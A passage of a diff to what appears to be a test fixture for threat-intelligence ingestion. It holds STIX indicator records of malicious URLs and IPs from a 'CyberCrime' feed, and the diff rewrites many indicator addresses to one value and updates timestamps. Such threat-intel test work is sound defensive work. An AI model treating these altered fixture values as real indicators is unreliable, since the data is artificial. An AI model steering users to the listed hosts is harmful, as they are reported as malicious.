http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:31.348Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5764,7 +5764,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385579252Z", + "ingested": "2021-12-13T08:38:40.023229400Z", "original": "{\"created\":\"2020-01-26T02:55:32.119Z\",\"description\":\"TS ID: 55256890158; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--1e540e5a-6fa3-4758-ab61-0d7692fb3d96\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-26T02:55:32.119Z\",\"name\":\"mal_url: http://jor1.berbagsansa.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jor1.berbagsansa.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:32.119Z\"}", "category": "threat", "type": "indicator", @@ -5783,7 +5783,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://92.63.192.190/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55256890152; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime", "modified": "2020-01-26T02:55:33.623Z", "valid_from": "2020-01-26T02:55:33.623Z", @@ -5807,16 +5807,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://92.63.192.190/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "92.63.192.190", - "full": "http://92.63.192.190/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385584191Z", - "original": "{\"created\":\"2020-01-26T02:55:33.623Z\",\"description\":\"TS ID: 55256890152; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--cbfc3b5d-645b-4114-ab89-7ab5b745d230\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-48\"],\"modified\":\"2020-01-26T02:55:33.623Z\",\"name\":\"mal_url: http://92.63.192.190/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://92.63.192.190/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.623Z\"}", + "ingested": "2021-12-13T08:38:40.023233500Z", + "original": "{\"created\":\"2020-01-26T02:55:33.623Z\",\"description\":\"TS ID: 55256890152; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--cbfc3b5d-645b-4114-ab89-7ab5b745d230\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-48\"],\"modified\":\"2020-01-26T02:55:33.623Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.623Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5834,7 +5834,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://190.14.38.202/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55256890143; iType: mal_url; State: active; Org: Offshore Racks S.A; Source: CyberCrime", "modified": "2020-01-26T02:55:33.646Z", "valid_from": "2020-01-26T02:55:33.646Z", @@ -5858,16 +5858,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://190.14.38.202/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "190.14.38.202", - "full": "http://190.14.38.202/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385588589Z", - "original": "{\"created\":\"2020-01-26T02:55:33.646Z\",\"description\":\"TS ID: 55256890143; iType: mal_url; State: active; Org: Offshore Racks S.A; Source: CyberCrime\",\"id\":\"indicator--f4cf51da-17db-4d9b-bb65-efeb1373f01b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-01-26T02:55:33.646Z\",\"name\":\"mal_url: http://190.14.38.202/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://190.14.38.202/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.646Z\"}", + "ingested": "2021-12-13T08:38:40.023237200Z", + "original": "{\"created\":\"2020-01-26T02:55:33.646Z\",\"description\":\"TS ID: 55256890143; iType: mal_url; State: active; Org: Offshore Racks S.A; Source: CyberCrime\",\"id\":\"indicator--f4cf51da-17db-4d9b-bb65-efeb1373f01b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-01-26T02:55:33.646Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.646Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5885,7 +5885,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://45.132.104.20/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55256890162; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-01-26T02:55:33.681Z", "valid_from": "2020-01-26T02:55:33.681Z", @@ -5909,16 +5909,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://45.132.104.20/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "45.132.104.20", - "full": "http://45.132.104.20/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385593067Z", - "original": "{\"created\":\"2020-01-26T02:55:33.681Z\",\"description\":\"TS ID: 55256890162; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--6e4e6382-002d-473a-a635-cc00d4917353\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-26T02:55:33.681Z\",\"name\":\"mal_url: http://45.132.104.20/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://45.132.104.20/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.681Z\"}", + "ingested": "2021-12-13T08:38:40.023240600Z", + "original": "{\"created\":\"2020-01-26T02:55:33.681Z\",\"description\":\"TS ID: 55256890162; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--6e4e6382-002d-473a-a635-cc00d4917353\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-26T02:55:33.681Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.681Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5969,7 +5969,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385597536Z", + "ingested": "2021-12-13T08:38:40.023244200Z", "original": "{\"created\":\"2020-01-26T02:55:33.738Z\",\"description\":\"TS ID: 55256890138; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--33552aa0-5a5a-47a6-b529-a810dcf8c9af\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-28\"],\"modified\":\"2020-01-26T02:55:33.738Z\",\"name\":\"mal_url: http://aboutworld.info/manage/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aboutworld.info/manage/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.738Z\"}", "category": "threat", "type": "indicator", @@ -5988,7 +5988,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://176.113.115.205/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55256890146; iType: mal_url; State: active; Org: Dzinet Ltd.; Source: CyberCrime", "modified": "2020-01-26T02:55:33.959Z", "valid_from": "2020-01-26T02:55:33.959Z", @@ -6012,16 +6012,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://176.113.115.205/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "176.113.115.205", - "full": "http://176.113.115.205/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385601754Z", - "original": "{\"created\":\"2020-01-26T02:55:33.959Z\",\"description\":\"TS ID: 55256890146; iType: mal_url; State: active; Org: Dzinet Ltd.; Source: CyberCrime\",\"id\":\"indicator--cd8459e5-367f-46b2-91e7-9893c766091a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-26T02:55:33.959Z\",\"name\":\"mal_url: http://176.113.115.205/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://176.113.115.205/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.959Z\"}", + "ingested": "2021-12-13T08:38:40.023248500Z", + "original": "{\"created\":\"2020-01-26T02:55:33.959Z\",\"description\":\"TS ID: 55256890146; iType: mal_url; State: active; Org: Dzinet Ltd.; Source: CyberCrime\",\"id\":\"indicator--cd8459e5-367f-46b2-91e7-9893c766091a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-26T02:55:33.959Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.959Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -6071,7 +6071,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385606202Z", + "ingested": "2021-12-13T08:38:40.023253200Z", "original": "{\"created\":\"2020-01-26T02:55:33.984Z\",\"description\":\"TS ID: 55256890128; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--274a9145-93f7-4146-a879-68fce2fc1188\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-26T02:55:33.984Z\",\"name\":\"mal_url: http://10121.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://10121.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.984Z\"}", "category": "threat", "type": "indicator", @@ -6122,7 +6122,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385610590Z", + "ingested": "2021-12-13T08:38:40.023257Z", "original": "{\"created\":\"2020-01-26T02:55:34.637Z\",\"description\":\"TS ID: 55256890132; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--ea0abbe1-3033-4549-8ba0-626f43807986\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-26T02:55:34.637Z\",\"name\":\"mal_url: http://1926.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://1926.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:34.637Z\"}", "category": "threat", "type": "indicator", @@ -6141,7 +6141,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 45.139.236.6", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55256890120; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-01-26T02:55:44.765Z", "valid_from": "2020-01-26T02:55:44.765Z", @@ -6163,12 +6163,12 @@ "first_seen": "2020-01-26T02:55:44.765Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "45.139.236.6" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385615349Z", - "original": "{\"created\":\"2020-01-26T02:55:44.765Z\",\"description\":\"TS ID: 55256890120; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--c7c3a0d7-fccd-4bc0-9011-a6c91f967402\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-26T02:55:44.765Z\",\"name\":\"mal_ip: 45.139.236.6\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '45.139.236.6']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:44.765Z\"}", + "ingested": "2021-12-13T08:38:40.023261300Z", + "original": "{\"created\":\"2020-01-26T02:55:44.765Z\",\"description\":\"TS ID: 55256890120; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--c7c3a0d7-fccd-4bc0-9011-a6c91f967402\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-26T02:55:44.765Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:44.765Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -6186,7 +6186,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 92.63.197.185", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55256890150; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime", "modified": "2020-01-26T02:55:48.315Z", "valid_from": "2020-01-26T02:55:48.315Z", @@ -6208,12 +6208,12 @@ "first_seen": "2020-01-26T02:55:48.315Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "92.63.197.185" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385619557Z", - "original": "{\"created\":\"2020-01-26T02:55:48.315Z\",\"description\":\"TS ID: 55256890150; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--383708ec-c15c-400a-94fc-40d6ac5ab8e3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:55:48.315Z\",\"name\":\"mal_ip: 92.63.197.185\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '92.63.197.185']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:48.315Z\"}", + "ingested": "2021-12-13T08:38:40.023266Z", + "original": "{\"created\":\"2020-01-26T02:55:48.315Z\",\"description\":\"TS ID: 55256890150; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--383708ec-c15c-400a-94fc-40d6ac5ab8e3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:55:48.315Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:48.315Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -6263,7 +6263,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385624396Z", + "ingested": "2021-12-13T08:38:40.023269800Z", "original": "{\"created\":\"2020-01-26T02:55:48.35Z\",\"description\":\"TS ID: 55256890136; iType: mal_url; State: active; Org: GoDaddy.com, LLC; Source: CyberCrime\",\"id\":\"indicator--14c3d4da-f364-4af0-96ba-ce8959da560b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-26T02:55:48.35Z\",\"name\":\"mal_url: http://185-24-53-218.com/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://185-24-53-218.com/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:48.35Z\"}", "category": "threat", "type": "indicator", @@ -6314,7 +6314,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385628734Z", + "ingested": "2021-12-13T08:38:40.023273500Z", "original": "{\"created\":\"2020-01-26T02:55:58.711Z\",\"description\":\"TS ID: 55256890133; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--64655563-a4ad-4097-8cda-68c7bcc461f4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:55:58.711Z\",\"name\":\"mal_url: http://1410.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://1410.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:58.711Z\"}", "category": "threat", "type": "indicator", @@ -6366,7 +6366,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385633784Z", + "ingested": "2021-12-13T08:38:40.023278700Z", "original": "{\"created\":\"2020-01-26T02:56:23.739Z\",\"description\":\"TS ID: 55256890139; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime\",\"id\":\"indicator--5ab7883f-17c2-4cc7-b854-33f8d4bc6b1e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-01-26T02:56:23.739Z\",\"name\":\"mal_url: http://nortonlilly.info/geli/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/geli/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:23.739Z\"}", "category": "threat", "type": "indicator", @@ -6417,7 +6417,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385639314Z", + "ingested": "2021-12-13T08:38:40.023286300Z", "original": "{\"created\":\"2020-01-26T02:56:23.79Z\",\"description\":\"TS ID: 55256890131; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--3417c349-153d-4002-92dd-1093893f3180\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-26T02:56:23.79Z\",\"name\":\"mal_url: http://2208.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://2208.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:23.79Z\"}", "category": "threat", "type": "indicator", @@ -6436,7 +6436,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 96.125.163.13", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55256890126; iType: mal_ip; State: active; Org: Websitewelcome.com; Source: CyberCrime", "modified": "2020-01-26T02:56:23.857Z", "valid_from": "2020-01-26T02:56:23.857Z", @@ -6458,12 +6458,12 @@ "first_seen": "2020-01-26T02:56:23.857Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "96.125.163.13" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385645015Z", - "original": "{\"created\":\"2020-01-26T02:56:23.857Z\",\"description\":\"TS ID: 55256890126; iType: mal_ip; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--00ae9f9a-03ce-415c-bb7a-49b6c486ac5d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-01-26T02:56:23.857Z\",\"name\":\"mal_ip: 96.125.163.13\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '96.125.163.13']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:23.857Z\"}", + "ingested": "2021-12-13T08:38:40.023293400Z", + "original": "{\"created\":\"2020-01-26T02:56:23.857Z\",\"description\":\"TS ID: 55256890126; iType: mal_ip; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--00ae9f9a-03ce-415c-bb7a-49b6c486ac5d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-01-26T02:56:23.857Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:23.857Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -6513,7 +6513,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385649974Z", + "ingested": "2021-12-13T08:38:40.023300500Z", "original": "{\"created\":\"2020-01-26T02:56:29.981Z\",\"description\":\"TS ID: 55256890129; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--dba2c4a2-6ad5-455c-b14a-b437d32ef6a3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:56:29.981Z\",\"name\":\"mal_url: http://1012.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://1012.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:29.981Z\"}", "category": "threat", "type": "indicator", @@ -6565,7 +6565,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385654272Z", + "ingested": "2021-12-13T08:38:40.023307600Z", "original": "{\"created\":\"2020-01-26T02:56:32.609Z\",\"description\":\"TS ID: 55256890141; iType: mal_url; State: active; Org: H4Y Technologies LLC; Source: CyberCrime\",\"id\":\"indicator--5049f714-5462-4f8d-8b13-d95024d477ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-26T02:56:32.609Z\",\"name\":\"mal_url: http://coupondemo.dynamicinnovation.net/ren/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://coupondemo.dynamicinnovation.net/ren/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:32.609Z\"}", "category": "threat", "type": "indicator", @@ -6616,7 +6616,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385658731Z", + "ingested": "2021-12-13T08:38:40.023311Z", "original": "{\"created\":\"2020-01-26T02:56:33.504Z\",\"description\":\"TS ID: 55256890156; iType: mal_url; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--b476b4e0-387e-4cc6-8b93-437e05c9099c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-26T02:56:33.504Z\",\"name\":\"mal_url: http://51.38.140.2/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://51.38.140.2/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:33.504Z\"}", "category": "threat", "type": "indicator", @@ -6667,7 +6667,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385663089Z", + "ingested": "2021-12-13T08:38:40.023316100Z", "original": "{\"created\":\"2020-01-26T02:56:37.688Z\",\"description\":\"TS ID: 55256890163; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime\",\"id\":\"indicator--27e994c3-5ee2-4f8b-9fc0-30ca4fc226ab\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-26T02:56:37.688Z\",\"name\":\"mal_url: http://baxarex228.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://baxarex228.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:37.688Z\"}", "category": "threat", "type": "indicator", @@ -6686,7 +6686,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 185.222.202.91", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55256890124; iType: mal_ip; State: active; Org: Global Data Networks LLC; Source: CyberCrime", "modified": "2020-01-26T02:56:40.170Z", "valid_from": "2020-01-26T02:56:40.17Z", @@ -6708,12 +6708,12 @@ "first_seen": "2020-01-26T02:56:40.170Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "185.222.202.91" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385667627Z", - "original": "{\"created\":\"2020-01-26T02:56:40.17Z\",\"description\":\"TS ID: 55256890124; iType: mal_ip; State: active; Org: Global Data Networks LLC; Source: CyberCrime\",\"id\":\"indicator--67020df4-8210-4e8f-afe0-4d44ccd8800d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-01-26T02:56:40.17Z\",\"name\":\"mal_ip: 185.222.202.91\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '185.222.202.91']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:40.17Z\"}", + "ingested": "2021-12-13T08:38:40.023319900Z", + "original": "{\"created\":\"2020-01-26T02:56:40.17Z\",\"description\":\"TS ID: 55256890124; iType: mal_ip; State: active; Org: Global Data Networks LLC; Source: CyberCrime\",\"id\":\"indicator--67020df4-8210-4e8f-afe0-4d44ccd8800d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-01-26T02:56:40.17Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:40.17Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -6731,7 +6731,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 49.51.171.215", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55256890165; iType: mal_ip; State: active; Org: Tencent Building, Kejizhongyi Avenue; Source: CyberCrime", "modified": "2020-01-26T02:56:49.862Z", "valid_from": "2020-01-26T02:56:49.862Z", @@ -6753,12 +6753,12 @@ "first_seen": "2020-01-26T02:56:49.862Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "49.51.171.215" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385672356Z", - "original": "{\"created\":\"2020-01-26T02:56:49.862Z\",\"description\":\"TS ID: 55256890165; iType: mal_ip; State: active; Org: Tencent Building, Kejizhongyi Avenue; Source: CyberCrime\",\"id\":\"indicator--f57e1196-0c96-4988-89f9-0b9d7301b524\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-26T02:56:49.862Z\",\"name\":\"mal_ip: 49.51.171.215\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '49.51.171.215']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:49.862Z\"}", + "ingested": "2021-12-13T08:38:40.023323600Z", + "original": "{\"created\":\"2020-01-26T02:56:49.862Z\",\"description\":\"TS ID: 55256890165; iType: mal_ip; State: active; Org: Tencent Building, Kejizhongyi Avenue; Source: 